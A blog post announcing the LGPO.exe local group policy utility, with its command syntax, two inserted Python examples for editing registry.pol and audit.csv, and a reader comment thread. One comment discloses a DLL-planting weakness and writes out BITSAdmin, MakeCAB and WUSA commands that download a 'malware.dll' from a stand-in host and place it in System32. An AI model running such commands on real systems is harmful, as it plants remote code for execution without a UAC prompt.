LGPO.exe is a new command-line utility to automate the management of local group policy. It replaces the no-longer-maintained LocalGPO tool that shipped with the Security Compliance Manager (SCM), and the Apply_LGPO_Delta and ImportRegPol tools.
Features:
- Import settings into local group policy from GPO backups or from individual policy component files, including Registry Policy (registry.pol), security templates, and advanced auditing CSV files.
- Export local policy to a GPO backup.
- Parse a Registry Policy (registry.pol) file to readable "LGPO text" directly to the console or redirected to a file, which can be edited and imported into local policy.
- Build a new Registry Policy (registry.pol) file from "LGPO text".
- Enable group policy client side extensions for local policy processing.
The zip file attached to this post includes LGPO.exe and full documentation. This is the command line syntax:
LGPO.exe v1.00 - Local Group Policy Object utility
LGPO.exe has four modes:
* Import and apply policy settings;
* Export local policy to a GPO backup;
* Parse a registry.pol file to "LGPO text" format;
* Build a registry.pol file from "LGPO text".
To apply policy settings:
LGPO.exe command [...]
where "command" is one or more of the following (each of which can be repeated):
/g path import settings from one or more GPO backups under "path"
/m path\registry.pol import settings from registry.pol into machine config
/u path\registry.pol import settings from registry.pol into user config
/s path\GptTmpl.inf apply security template
/a[c] path\Audit.csv apply advanced auditing settings; /ac to clear policy first
/t path\lgpo.txt apply registry commands from LGPO text
/e <name>|<guid> enable GP extension for local policy processing; specify a
GUID, or one of these names:
* "zone" for IE zone mapping extension
* "mitigation" for mitigation options, including font blocking
* "audit" for advanced audit policy configuration
/boot reboot after applying policies
/v verbose output
/q quiet output (no headers)
To create a GPO backup from local policy:
LGPO.exe /b path [/n GPO-name]
/b path Create GPO backup in "path"
/n GPO-name Optional GPO display name (use quotes if it contains spaces)
To parse a Registry.pol file to LGPO text (stdout):
LGPO.exe /parse [/q] {/m|/u} path\registry.pol
/m path\registry.pol parse registry.pol as machine config commands
/u path\registry.pol parse registry.pol as user config commands
/q quiet output (no headers)
To build a Registry.pol file from LGPO text:
LGPO.exe /r path\lgpo.txt /w path\registry.pol [/v]
/r path\lgpo.txt Read input from LGPO text file
/w path\registry.pol Write new registry.pol file
(See the documentation for more information and examples.)
[Update: the latest version of LGPO.exe is here.]
Why is there no Support for MLGPO?
[Aaron Margosis] I've never had a need for it, and no one in any of the customer spaces I've worked with has ever asked me to add that.
Hi,
with the deprecated LocalGPO tool you could create the LocalGPO Packs and apply those from the command line to specific users. I think I'm talking about the same thing as the poster above.
This was really handy in some situations before.
So even if it is not implemented yet is it possible to integrate this in the future to apply registry.pol files or LGPO Texts to specific user accounts only?
Hi,
Thank you for your excellent work. We make heavy use of the mlgpo function as well, it adds a flexibility I cannot find an easy replacement for. Any chance of adding that functionality back in?
[Aaron Margosis] I'll raise the priority. Note also that while LocalGPO is not being maintained, it can still be downloaded with the SCM.
Can you describe in more detail how you use MLGPO and the value it provides? Thanks.
Any chance the LGPO source code will be posted as with the old tools? It makes it way easier for software to be approved for use if the source is available.
[Aaron Margosis] Probably not this time. This one is digitally signed, though.
When applying multiple registry-based commands from an “LGPO text” file using the /t command and then sysprep a W10v1511 getting [0x0f0083] SYSPRP ActionPlatform::LaunchModule: Caught an unhandled exception while trying to load and execute 'ProvPackageSysprepGeneralize' from C:\Windows\System32\ProvSysprep.dll – normally these LGPO text files are about 10 or so files but place it into one file / remove user and only computer settings, same error. Remove the LGPO /t settings and it will sysprep. These are set in a MDT task sequence
[Aaron Margosis] Based on your description, it doesn't sound like the LGPO tool is the cause — more like the policies you're pushing in are causing Sysprep to fail somehow.
Hello, I just wanted to weigh in. We too use the MLGPO command from LocalGPO extensively when deploying kiosk and some user computers. It allows setting policies for specific users. This has become a vital component in our environment; if I could use LocalGPO with Windows 10 I would. LocalGPO does a great job of applying machine policies but does not have the ability to restore or set MLGPO policies on Windows 10 devices.
If LGPO has this functionality I would be a happy camper 🙂
Issues with LocalGPO on Windows 10
I have patched the file so that it may work on Windows 10, here's the link
https://social.technet.microsoft.com/Forums/en-US/e98d8ac5-b091-4209-bc0d-02ba020666e0/localgpo-tool-for-windows-81?forum=compliancemanagement
If I run:
cscript "C:\Program Files (x86)\LocalGPO"\LocalGPO.wsf /Restore
I receive:
(1403, 10) WshShell.Run: Unable to wait for process.
If I run:
cscript "C:\Program Files (x86)\LocalGPO"\LocalGPO.wsf /Path:"C:\Program Files ……. /MLGPO:kiosk
I receive:
Windows XP and Windows Server 2003 do not support MLGPO!!
I understand LocalGPO was not created for Windows 10 but if MLGPO becomes a part of LGPO that would be very beneficial. Thank You
I'm having an issue with importing audit.csv settings, on Win 7 Enterprise x64.
If I import with "/a" (do not clear existing settings), the new setting appears to be active according to auditpol.exe /get, but the System32\GroupPolicy\Machine\microsoft\windows nt\audit\audit.csv is not updated, and at the next 'gpupdate' the setting reported by auditpol.exe reverts to the previous value defined in audit.csv.
If I import with "/ac" (clear existing settings), the copy of audit.csv at system32\grouppolicy\machine\microsoft\windows nt\audit\audit.csv is replaced with the new value and everything appears to work.
Am I doing something wrong here?
[Aaron Margosis] No, that's the best that LGPO.exe can do, at least for now. What appears in the Group Policy editor is not necessarily what's actually in effect. See this Ned Pyle blog post for more information.
The LGPO.exe documentation says this:
/a[c] path\audit.csv
Apply an Advanced Auditing backup (CSV) file. With /ac, LGPO.exe clears existing Advanced Auditing settings before applying the settings from the CSV file, and copies the file to the local group policy subdirectory so that the settings appear in the local group policy editor.
We use MLGPO to apply policies specific to users and groups of users. It is primarily used on non-domain systems to establish policies for non-admins, both on workstations and terminal servers. It is also a key component of kiosk systems for us as well.
Apologies for the late reply.
Maybe I'm missing something. I don't think this is only limiting the ability to view values in the group policy editor.
After executing lgpo.exe /a , the results of "auditpol.exe /get" reflect the new value, but _only_ until the next gpupdate executes. After gpupdate executes, the system reverts back to the previous setting (which remained defined in audit.csv). Does this imply that lgpo.exe /a is ineffective at permanently adding advanced audit settings?
I'm going to attempt to workaround this in script, by retrieving the current audit.csv, modifying it to merge in the new values I wish to apply, then using lgpo.exe /ac to apply the now-complete audit.csv. That's still more complex than what I had hoped for when I saw this new tool appeared to be able to modify the advanced audit settings.
[Aaron Margosis] Your analysis is correct. With /a, lgpo.exe invokes "auditpol.exe /restore" but as you point out that doesn't touch the local policy store. I had wanted to avoid having to write an audit.csv parser, let alone an audit.csv editor. That may be needed if lgpo.exe is to be a complete solution.
I don't want to sound unappreciative on the audit policy restore. Parsing the CSV myself and applying with LGPO.exe /ac is working like a charm, and it's very nice to have Secedit policy, Registry policy, and Audit policy all in one tool. Thanks much, this tool is looking to be very helpful for me!
[Aaron Margosis] I'm glad it's of help. And I appreciate the helpful feedback.
In using LGPO's "Exporting local policy to a GPO backup" the files Backup.xml and Bkupinfo.xml have "Contoso.test" in all of the domain name references. The local policy that was backed up came from a domain workstation at work. Maybe I don't fully understand how GPO backup (and restore) works, but should these two files be referencing contoso or should the real domain name be stored in those two files?
[Aaron Margosis] The "real domain name" in this case would be the local computer name, which wouldn't be of any interest on any other computer.
Thanks for the quick reply, Aaron. Apologies — I should have stated my whole concern in the first post. I'd like to take this LGPO backup from a test suite and import it into a production suite. How do those references to domain "Contoso.test" resolve when restoring this backup into a different domain? Or, is some kind of manual editing needed to make the LGPO backup suitable for restoring in a different domain? Thanks again.
[Aaron Margosis] From what I've seen, it's not an issue. I pretty much copied what the older LocalGpo tool did in this regard, and I don't remember hearing of any problems with it. If I remember correctly, the way I've seen this work is to create a new GPO in AD, then choose Import Settings and pick the local backup. I don't think the "Contoso" designations matter at that point – I believe the import picks up only the settings.
Hi Aaron,
We basically came across your tool as our requirements led us to get around 200+ workgroup servers in our DMZs to apply a set of settings from Local Group Policies.
So if I understand that right, I will just take a GPO from our domain, export it and import it with LGPO.exe /g Path – so that's straightforward.
What I miss here (or have I missed it?) is the possibility to reset the settings to default – as when I import a previously exported "empty" GPO, that won't change anything.
As you can imagine – when I deploy those settings to a couple of hundred servers, I do need a way back 😉
Thanks!
[Aaron Margosis] It depends on the settings. On the whole, you should capture a backup before you apply the new settings. Note though that some settings that can be applied through a security template don't show up in backups. Advanced Auditing settings shouldn't be a problem. For the registry.pol settings (Administrative Templates and a few others), you could probably delete the registry.pol files and apply the ones you captured in a backup.
FWIW, I never trusted the "restore OS default" mechanism that the old LocalGPO script implemented, and I opted not to try to implement it in LGPO.exe.
I am still looking for a way to make this work in 2016/Windows 10, I am happy to work with the old vb script to try and get it working, but I would appreciate any suggestions you might have on how to adjust that script so it works properly in the new OS. Thank you.
[Aaron Margosis] I assume you're referring to the not-yet-implemented MLGPO feature.
I don't know whether this is a complete fix, but edit LocalGpo.wsf, find the line that says
If(Left(strOpVer,3) = "6.2") and (strProductType <> "1") then
and in that block, add something like this (NOT TESTED):
If(Left(strOpVer,3) = "10.") then
Keep the assignment the same for this case:
strOS = "Win8"
If you assign it something like "Win10" the rest of the script won't recognize it.
I'd also like to add my request to have MLGPO functionality added. In our organization we'd like to be able to apply specific policies to select users on workstations and kiosks so this functionality is very useful. Thank you.
Is there any ability to remove a setting from Registry.pol (i.e. changing to "Not Configured") using the LGPO text format?
According to the PDF, the "DELETE" action behaves as "Deletes the value (reverting a policy to "Not Configured")" – but the behavior I see from trying to remove the value HKLM\Software\Test\NewValue from management is that the "Software\Test;**del.NewValue;%01;%04;" directive is added to Registry.pol, so the value is removed from the Registry each time Group Policy is reapplied. That's not equivalent to "Not Configured", that's actually "Managed Removal of Registry Key".
What I'm looking for is an ability to "Un-Do" the management of a registry key value, to have no reference to that key remaining in Registry.pol. Is there a better option than 1) Dump current registry.pol to text 2) Delete the reference in the text export 3) Delete registry.pol 4) import the modified text?
[Aaron Margosis] I think that's probably the best way. LGPO.exe doesn't have the ability to edit the registry.pol file directly.
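As an added example (not part of LGPO.exe or its documentation), the following Python performs the dump, edit and rebuild steps directly on the registry.pol binary, so a managed value can be dropped entirely rather than replaced by a **del. directive; it also covers the parse and build modes the post describes. It assumes the documented registry.pol layout ('PReg' magic, version DWORD 1, UTF-16LE [key;value;type;size;data] entries), and the key, value and data in the sample are constructed.

```python
"""Parse, edit and rebuild a Group Policy registry.pol file.

Added example, not LGPO.exe code. Layout assumed: 'PReg' magic, DWORD version 1,
then UTF-16LE entries [key;value;type;size;data] with NUL-terminated strings.
"""
import struct
from dataclasses import dataclass
from typing import List

MAGIC = b"PReg"
VERSION = 1
REG_SZ, REG_EXPAND_SZ, REG_DWORD = 1, 2, 4
REG_TYPE_NAMES = {0: "REG_NONE", 1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY",
                  4: "REG_DWORD", 7: "REG_MULTI_SZ", 11: "REG_QWORD"}


@dataclass
class PolEntry:
    key: str      # key path relative to HKLM\ or HKCU\ (e.g. Software\Test)
    value: str    # value name, or a directive such as **del.Name
    type: int     # REG_* type code
    data: bytes   # raw value data exactly as stored in the file


def _u16(text: str) -> bytes:
    return text.encode("utf-16-le")


def _read_string(buf: bytes, pos: int):
    """Read a NUL-terminated UTF-16LE string at pos; return (text, offset past the NUL)."""
    end = pos
    while True:
        if end + 2 > len(buf):
            raise ValueError("unterminated string in registry.pol")
        if buf[end:end + 2] == b"\x00\x00":
            return buf[pos:end].decode("utf-16-le"), end + 2
        end += 2


def _expect(buf: bytes, pos: int, token: str) -> int:
    if buf[pos:pos + 2] != _u16(token):
        raise ValueError(f"expected {token!r} at offset {pos}")
    return pos + 2


def parse_pol(buf: bytes) -> List[PolEntry]:
    """Decode every [key;value;type;size;data] entry; reject a bad magic or version."""
    if buf[:4] != MAGIC:
        raise ValueError("not a registry.pol file (missing PReg magic)")
    (version,) = struct.unpack_from("<I", buf, 4)
    if version != VERSION:
        raise ValueError(f"unsupported registry.pol version {version}")
    entries, pos = [], 8
    while pos < len(buf):
        pos = _expect(buf, pos, "[")
        key, pos = _read_string(buf, pos)
        pos = _expect(buf, pos, ";")
        value, pos = _read_string(buf, pos)
        pos = _expect(buf, pos, ";")
        (rtype,) = struct.unpack_from("<I", buf, pos)
        pos = _expect(buf, pos + 4, ";")
        (size,) = struct.unpack_from("<I", buf, pos)
        pos = _expect(buf, pos + 4, ";")
        data = buf[pos:pos + size]
        if len(data) != size:
            raise ValueError("truncated value data")
        pos = _expect(buf, pos + size, "]")
        entries.append(PolEntry(key, value, rtype, data))
    return entries


def build_pol(entries: List[PolEntry]) -> bytes:
    """Serialise entries back into registry.pol bytes (inverse of parse_pol)."""
    out = bytearray(MAGIC + struct.pack("<I", VERSION))
    for e in entries:
        out += _u16("[") + _u16(e.key) + b"\x00\x00" + _u16(";") + _u16(e.value) + b"\x00\x00"
        out += _u16(";") + struct.pack("<I", e.type) + _u16(";") + struct.pack("<I", len(e.data))
        out += _u16(";") + e.data + _u16("]")
    return bytes(out)


def describe(e: PolEntry) -> str:
    """One readable line per entry. A **del. directive is shown as a managed DELETE:
    it is re-applied on every policy refresh, which is not 'Not Configured'."""
    if e.value.lower().startswith("**del."):
        return f"{e.key}  DELETE {e.value[6:]}"
    if e.type == REG_DWORD and len(e.data) == 4:
        return f"{e.key}  {e.value}  DWORD:{struct.unpack('<I', e.data)[0]}"
    if e.type in (REG_SZ, REG_EXPAND_SZ):
        text = e.data.decode("utf-16-le").rstrip("\x00")
        return f"{e.key}  {e.value}  {REG_TYPE_NAMES[e.type]}:{text}"
    return f"{e.key}  {e.value}  {REG_TYPE_NAMES.get(e.type, e.type)}:{e.data.hex()}"


def unmanage(buf: bytes, key: str, value: str) -> bytes:
    """Return registry.pol bytes with no reference to key\\value at all (neither a set
    nor a **del. directive), so the setting reads 'Not Configured' after the next refresh."""
    drop = {value.lower(), "**del." + value.lower()}
    keep = [e for e in parse_pol(buf)
            if not (e.key.lower() == key.lower() and e.value.lower() in drop)]
    return build_pol(keep)


# Constructed sample (not from any real system): the Software\Test\NewValue setting
# from the question above, a **del. directive, and a hypothetical REG_SZ value.
SAMPLE_POL = build_pol([
    PolEntry(r"Software\Test", "NewValue", REG_DWORD, struct.pack("<I", 1)),
    PolEntry(r"Software\Test", "**del.OldValue", REG_SZ, _u16(" ") + b"\x00\x00"),
    PolEntry(r"Software\Policies\Example", "Banner", REG_SZ, _u16("hello") + b"\x00\x00"),
])

if __name__ == "__main__":
    for entry in parse_pol(SAMPLE_POL):
        print(describe(entry))
    print([describe(x) for x in parse_pol(unmanage(SAMPLE_POL, r"Software\Test", "NewValue"))])
```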
Consider this another vote for MLGPO support. The GPOPack.wsf from SCM / MDT can copy to MLGPO, but unfortunately does not merge settings, it only overwrites them. Having a single tool that can handle all the forms of Local Group Policy would be great.
Aaron,
We could use LocalGPO.wsf to make "MSS:" settings editable: Cscript LocalGPO.wsf /ConfigSCE. You stated that the LocalGPO tool won't be supported any longer. What should we use as a replacement in order to be able to work with "MSS:"?
Thank you.
[Aaron Margosis] We included a replacement in the Win10 baselines in the form of a custom ADMX and ADML file. Install those files in the appropriate locations and then find the settings in your Group Policy editor in Computer Configuration | Administrative Templates | MSS (Legacy).
Hi Aaron,
thank you very much for your good work.
We're using LGPO.exe quite often for exporting local machine / user policies.
After that we deploy/import them on other systems.
One question…
Is it possible to empty/clear/reset a local machine/user config?
So that every local policy is set to “not configured” ?
Thanks in advance
[Obligatory preface] Hi, please forgive me in advance, as I am a very fresh IT intern at an incredibly disorganized (and under-staffed!) non-profit. My main task as of late is configuring many new machines -most of which we don’t have images for- so I’m building these from scratch and implementing all of the necessary configurations. We also are running Server 2003, but are receiving a large influx of Surface tablets (that I cannot image, or basically have fumbled around with third party imaging software for long enough that I gave up due to time constraints) and I’m looking for a utility to streamline part of this process. I have no experience with this utility and its functionality, and my scripting knowledge is similarly limited.
I am looking to simply replicate my Local Group Policy settings via script, and from what I’ve read, this utility should be able to manage that for me very simply. As I’ve mentioned before, I have limited access to the domain, etc, so I’m relying on all of this being done on the local machine’s admin account.
I’ve downloaded the zip file (https://msdnshared.blob.core.windows.net/media/TNBlogsFS/prod.evol.blogs.technet.com/telligent.evolution.components.attachments/01/4062/00/00/03/65/94/81/Windows%2010%20TH2%20Security%20Baseline.zip) and extracted it, I’ve read through the documentation provided, but am experiencing issues (probably a very simple command line error) getting the utility to run on my Win 10 machine. After having several goes at installing the client and running the application, I still receive an error when attempting to run the LGPO.exe command (etc) to export my Group Policy configuration to the specified path.
Is there perhaps a manual for novices like myself trying to take a crack at this utility? Thanks in advance for your help, and I appreciate any response as I know it may be frustrating dealing with a ‘green’ tech.
My apologies, the error I mentioned before states that the LGPO.exe isn’t found/cannot be located.
We are using the LGPO.exe tool to export Local Group Policy settings in Windows 10 (using LGPO.exe /b) and then import the settings on other Windows 10 PCs (using LGPO.exe /g). All of the PCs are standalone PCs and are NOT networked or part of a domain. We have noticed some issues when exporting/importing. All of the issues appear to relate to the audit.csv file. We are using the “Advanced Audit Policy Configuration” so the policy “Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings” is enabled.
1 – The LGPO tool attempts to overwrite the audit.csv held on the local machine (in C:\Windows\System32\GroupPolicy\Machine\Microsoft\Windows NT\Audit). However, during testing it was apparent that this sometimes fails despite being run with admin privileges. The LGPO tool does report the failure but it’s easy to miss. If it does fail then your policy settings in [Computer Configuration->Windows Settings->Security Settings->Advanced Audit Policy Configuration] will not be applied. We have found the most reliable work around to this is to manually delete the audit.csv in “C:\Windows\System32\GroupPolicy\Machine\Microsoft\Windows NT\Audit” before performing an LGPO import.
2 – When LGPO perform the export, it does NOT copy the audit.csv file in “C:\Windows\System32\GroupPolicy\Machine\Microsoft\Windows NT\Audit”. Instead, it builds the audit.csv file from all of the local group policy settings defined in the “Advanced Audit Policy Configuration”. This generated audit.csv is then copied to the Audit directory on the target PC when the LGPO import is performed. We have experienced some strange desktop issues once the import is applied on another PC. The issue is not immediately apparent and requires a PC reboot. The main error that we have encountered is : “c:\windows\system32\config\systemprofile\desktop is unavailable”. In addition, the Start Menu is unavailable and other components such as OneDrive appear to fail. Through the process of elimination we have narrowed these errors down to one single line entry in the exported audit.csv file :
,,FileGlobalSacl,,,,
If this line is removed from the exported audit.csv file then we do not encounter any problems. Assuming the export is to the C:\Temp directory, our current work-around is to :
Step 1 – Export the Local Group Policy Settings using : LGPO.exe /b C:\Temp\
Step 2 – Overwrite generated audit.csv file in “C:\Temp\{GUID}\DomainSysvol\GPO\Machine\microsoft\windows nt\Audit\audit.csv” with the audit.csv from “C:\Windows\System32\GroupPolicy\Machine\Microsoft\Windows NT\Audit”.
Step 3 – Import the Local Group Policy settings on another PC using : LGPO.exe /g
Unless configured, the audit.csv copied in Step 2 will not contain the FileGlobalSacl definition.
LGPO doesn’t report any errors when we do an import (using /g). It’s only evident that a problem has occurred on reboot (gpupdate /force doesn’t cause it to fail). Yes we are applying AppLocker rules so I will double check those. It does look like the audit.csv is causing the problem though since replacing the exported audit.csv with the one held on the local machine appears to fix the problem.
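The merge workaround described earlier in the thread (take the current audit.csv, merge in the new rows, apply the result with LGPO.exe /ac) and the empty FileGlobalSacl line reported just above can be handled in one pass. The following Python is an added example, not LGPO.exe code; it assumes the column layout auditpol.exe /backup writes, and the sample rows and GUIDs are constructed placeholders.

```python
"""Merge two Advanced Audit Policy CSV files for application with LGPO.exe /ac.

Added example, not LGPO.exe code. Assumes the layout auditpol.exe /backup writes:
Machine Name,Policy Target,Subcategory,Subcategory GUID,Inclusion Setting,
Exclusion Setting,Setting Value. Rows are keyed by Subcategory GUID (falling back
to the subcategory name); rows from the new file override rows from the current one.
"""
import csv
import io
from typing import List

HEADER = ["Machine Name", "Policy Target", "Subcategory", "Subcategory GUID",
          "Inclusion Setting", "Exclusion Setting", "Setting Value"]


def _rows(text: str) -> List[List[str]]:
    """Validate the header and return the non-empty data rows."""
    reader = csv.reader(io.StringIO(text))
    header = next(reader, None)
    if header is None or [h.strip() for h in header] != HEADER:
        raise ValueError("unexpected audit.csv header")
    return [r for r in reader if any(f.strip() for f in r)]


def _key(row: List[str]) -> str:
    guid = row[3].strip().lower()
    return guid or row[2].strip().lower()


def _is_empty_global_sacl(row: List[str]) -> bool:
    """True for a FileGlobalSacl row carrying no SACL at all: the ',,FileGlobalSacl,,,,'
    line the report above traced its post-import desktop failures to."""
    return row[2].strip() == "FileGlobalSacl" and not any(f.strip() for f in row[4:])


def merge_audit_csv(current: str, new: str, drop_empty_global_sacl: bool = True) -> str:
    """Return CSV text: the current settings, overridden and extended by the new ones,
    in a form that can be written to audit.csv and applied with LGPO.exe /ac."""
    merged, order = {}, []
    for row in _rows(current) + _rows(new):
        if len(row) != len(HEADER):
            raise ValueError(f"malformed row: {row!r}")
        if drop_empty_global_sacl and _is_empty_global_sacl(row):
            continue
        k = _key(row)
        if k not in merged:
            order.append(k)
        merged[k] = row          # later (new) rows win, position of first sighting kept
    out = io.StringIO()
    writer = csv.writer(out, lineterminator="\r\n")
    writer.writerow(HEADER)
    for k in order:
        writer.writerow(merged[k])
    return out.getvalue()


# Constructed sample files; the GUIDs are placeholders, not real subcategory identifiers.
CURRENT_CSV = "\r\n".join([
    ",".join(HEADER),
    ",System,Audit Logon,{00000000-0000-0000-0000-000000000001},Success,,1",
    ",System,Audit Logoff,{00000000-0000-0000-0000-000000000002},Success,,1",
    ",,FileGlobalSacl,,,,",
    "",
])
NEW_CSV = "\r\n".join([
    ",".join(HEADER),
    ",System,Audit Logon,{00000000-0000-0000-0000-000000000001},Success and Failure,,3",
    ",System,Audit Process Creation,{00000000-0000-0000-0000-000000000003},Success,,1",
    "",
])

if __name__ == "__main__":
    print(merge_audit_csv(CURRENT_CSV, NEW_CSV), end="")
```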
Can this executable be redistributed in a commercial product? I didn’t see any license information in the documentation.
The LGPO utility errors out when you set MaximumPasswordAge=0. If I change it to any other number it works fine. (I also have MinimumPasswordAge=0.)
Consider this another vote for MLGPO support, I work in a library and all of our Public workstations are on a completely separate network far away from our Domain server. I use MLGPO on all of these public workstations to limit what the users have access to on these machines.
You forgot to inhibit that LGPO.exe can be run on Windows Vista, Windows 7 and Windows Server 2008 [R2] when KB2533623 is not installed there!
CWE-426 and CWE-427 should really be well-known after 15+ years now!
LGPO.exe loads api-ms-win-core-fibers-l1-1-1.dll, api-ms-win-core-localization-l1-2-1.dll, api-ms-win-appmodel-runtime-l1-1-1.dll and ext-ms-win-kernel32-package-current-l1-1-0.dll
These files don’t exist on Windows 7 and earlier.
Take a look at recent MSRC bulletins: this vulnerability was fixed in some Windows components (and still needs to be fixed in quite some more)
Please eat your own dogfood!
Call one of the new Win32 APIs introduced with KB2533623, for example (really: best) SetDefaultDllDirectories(LOAD_LIBRARY_SEARCH_SYSTEM32)
This removes the “application directory” from the DLL search path.
DEFENSE IN DEPTH — the !Microsoft way
Under the user account created during Windows setup run the following command lines from Start->Run:
BITSAdmin.exe /Transfer foobar http://example.com/malware.dll “%TEMP%\ext-ms-win-kernel32-package-current-l1-1-0.dll”
MakeCAB.exe “%TEMP%\ext-ms-win-kernel32-package-current-l1-1-0.dll” “%TEMP%\foobar.cab”
WUSA.exe “%TEMP%\foobar.cab” /Extract:”%SystemRoot%\System32″
LGPO.exe is digitally signed with a Microsoft certificate; tampering with the binary invalidates its signature.
The unmodified, signed and trusted binary but loads and executes untrusted code when run from an untrusted location.
Default installations of Windows allow users to write to System32, WITHOUT triggering an UAC prompt!
Is this “game over” enough?
If you start LGPO.exe under Windows 7 (this is the Windows version with the biggest market share) from a trusted directory it will load api-ms-win-core-fibers-l1-1-1.dll, api-ms-win-core-localization-l1-2-1.dll, api-ms-win-appmodel-runtime-l1-1-1.dll and ext-ms-win-kernel32-package-current-l1-1-0.dll from the PATH
GET A CLUE!
LGPO.exe SHOULD write a warning to stderr when it creates text output files which can’t restore the registry.pol completely, but write
;;; —- Commented out because “LGPO.exe /t” cannot process this command
to stdout.
OTOH processing/implementing of REG_QWORD for export and import should be possible: SAFER rules need this, for example.
JFTR: why did you “invent” your own format for the LGPO text files? The well-known format of registry entries in .INF files is a single line and should be easier to parse/implement!
I hadn’t implemented QWORD because I hadn’t come across an actual need and no one had asked for it. Are you actually implementing SAFER rules? I haven’t seen anyone use those in well over a decade.
I created a new format because .inf syntax was insufficient to replicate the full set of commands that can be represented in a registry.pol file, including creating a key without values, deleting a value, and deleting all values in a key.
| Are you actually implementing SAFER rules?
Of course, since more than 12 years, on all versions and editions of Windows.
| I haven’t seen anyone use those in well over a decade.
Better look at the bright side of life.-P
| I created a new format because .inf syntax was insufficient to replicate the full set of commands that can be represented in a registry.pol file, including creating a key without values,
That’s FLG_REG_KEYONLY, 0x10
| deleting a value,
That’s FLG_ADDREG_DELVAL, 0x4
| and deleting all values in a key.
Please dare to extend the existing format as necessary: you can always introduce new flags.
My proposal is to reuse the existing and well-known “AddReg” syntax:
,[],[],[,]
ARGH!
The blog software sucks, it eats < and >
| ,[],[],[,]
hive,[key, name],[value name],flag|type[,value data]
I too am using Software Restriction Policies (Safer) and am having trouble with LGPO’s lack of qword functionality. By failing to import the “LastModified” qword value, but still importing the remaining Software Restriction Policies, I end up with machines that not only fail SRP, but also cannot produce Group Policy Results from either the GPMC wizard or gpresult /h. Instead I get a message “object reference not set to an instance of an object”
Sorry for the late reply, I think I missed a notification on your comment.
What Software Restriction Policies gets me, is actually very little. A percentage point on a CIS benchmark score and a security auditor who chastises me (a little) less.
SRP is also available on Professional editions, where AppLocker requires Enterprise or Ultimate, but we are going third-party for whitelisting.
I’ve since stopped trying to apply SRP policies with LGPO, but it’s been handling all my other (non-QWORD) tasks fine. I see there’s a LGPO 2.0 prerelease, I look forward to checking it out soon. Thanks for the great work and support!
Can LGPO reset local policy, or be given a set of policy to _remove_?
I’m trying to implement SAFER rules, and need a way to add/remove them on-demand.
Yes, we’re actually using them, unless there’s a better way to block executables in %AppData%. As an MSP, our app lists are too large and varied to reasonably implement an Applocker whitelist.
SAFER reads its rules and settings only from the registry, not from the registry.pol file.
The registry.pol is maintained via secpol.msc and local security policies or group policies only; policies defined there will periodically be (re)written to the registry.
If you don’t use secpol.msc or GPO you can modify the registry on demand.
This is… EXACTLY what I was looking for a long time now.
It’s a good thing that you replaced that messed up LocalGPO with all those scripts and unnecessary additions, with this neat and straight forward tool that does it all.
Thanks in advance. I really appreciate it!
I currently use LocalGPO.wsf to create GPOPacks for use in MDT 2013. Having just found out that LocalGPO.wsf is deprecated and this tool is its replacement, can you explain how to create a GPOPack for use with MDT please.
Can this handle policies with group policy registry preferences? I don’t see any syntax to apply a registry.xml as created by a preference.
Truly appreciate all the hard work on this!
Ignore the trolls, and I vote to delete ALL posts by that dude.
Lastly, PLEASE add support for MLGPO. I use it every week.
Hi Aaron,
I have seen that LGPO adjusts settings of my hardening template when configuring user rights.
Is there a way to force the application of settings ?
And, have you a list of settings which can be adjusted by LGPO ? Only user rights or are there other settings?
Thanks
Regards
Greg
Anyone manage to get this to apply an export successfully during an MDT task sequence? I’m trying to apply an export to Windows 10 RS1 via MDT 2013 Update 2. Create an application with source files, working directory is the application directory, with an installation batch file that just calls .\LGPO.exe /g .\. Always works when I run it manually, but when I run it from MDT I always get errors like this:
Z:\Applications\LGPO>LGPO.exe /g .\
LGPO.exe v1.00 – Local Group Policy Object utility
Audit policy directory exists
Copied .\{7CAC6114-22D3-4914-A3D6-8B9AB789C7D7}\DomainSysvol\GPO\Machine\microsoft\windows nt\Audit\audit.csv
to C:\windows\system32\GroupPolicy\Machine\Microsoft\Windows NT\Audit\audit.csv
Clearing existing audit policy
Apply Audit policy from .\{7CAC6114-22D3-4914-A3D6-8B9AB789C7D7}\DomainSysvol\GPO\Machine\microsoft\windows nt\Audit\audit.csv
Apply security template: .\{7CAC6114-22D3-4914-A3D6-8B9AB789C7D7}\DomainSysvol\GPO\Machine\microsoft\windows nt\SecEdit\GptTmpl.inf
Configuring the current system with this template in the /overwrite mode will result in losing the existing security records in the database specified.Do you want to continue this operation ? [y/n]
The system cannot find the file specified.
The task has completed with an error.
See log C:\Users\ADMINI~1\AppData\Local\Temp\GPT3E9D.tmp for detail info.
[[[ Security template log file output follows: C:\Users\ADMINI~1\AppData\Local\Temp\GPT3E9D.tmp ]]]
——————————————-
Wednesday, August 10, 2016 8:53:00 AM
Warning 2: The system cannot find the file specified.
Error opening Z:\Applications\LGPO\{7CAC6114-22D3-4914-A3D6-8B9AB789C7D7}\DomainSysvol\GPO\Machine\microsoft\windows nt\SecEdit\GptTmpl.inf.
Warning 6: The handle is invalid.
—-Configuration engine was initialized with one or more errors.—-
Any ideas?
I’m sure there are other ways, but my solution to get this working in MDT was to create an application with the exported GPO as the source files and include an installation batch file with it. The Quiet Install command for the application is install.cmd and the working directory is the application directory. The batch file copies the content locally, executes LGPO from there, and then cleans up. For some reason this worked, but it always errored when running from the Application Directory.
Batch file code:
REM Create temp dir for source files
md %temp%\LGPO_Inst
REM copy files to local temp dir for execution
xcopy *.* %temp%\LGPO_Inst /E /H /C /I /Q /Y
REM switch to local temp dir for execution
cd /d %temp%\LGPO_Inst
REM Apply Local GPO
LGPO.exe /g .\
cd ..
REM Cleanup
rd %temp%\LGPO_Inst /s /q
I have the same problem when using the LGPO tool. I always get “Configuring the current system with this template in the /overwrite mode will result in losing the existing security records in the database specified.Do you want to continue this operation ? [y/n]”. What is the correct solution? I don’t use MDT.
Is there a way to enable the MSS hidden entries with this tool? The option for LocalGPO was /ConfigSCE. My GPO backup has some of these entries set but they do not show on my Windows 10 testing. Thanks.
1. Download the policy templates to a location on your local machine (in my example the policy template came in the form of a zip file)
2. Extract the .admx or .adml file(s) to a location on your local machine
3. Copy .admx files to ‘%systemroot%\policyDefinitions’
4. Copy the corresponding language .adml files related to the .admx files to ‘%windir%\PolicyDefinitions\en-us’
5. After you have done the above steps, you can test to see if the group policy object templates settings you imported are viewable
6. Open up run [Windows key + r]
7. Type in: gpedit.msc
8. Press the enter key, on the keyboard
9. The local group policy object editor will be open
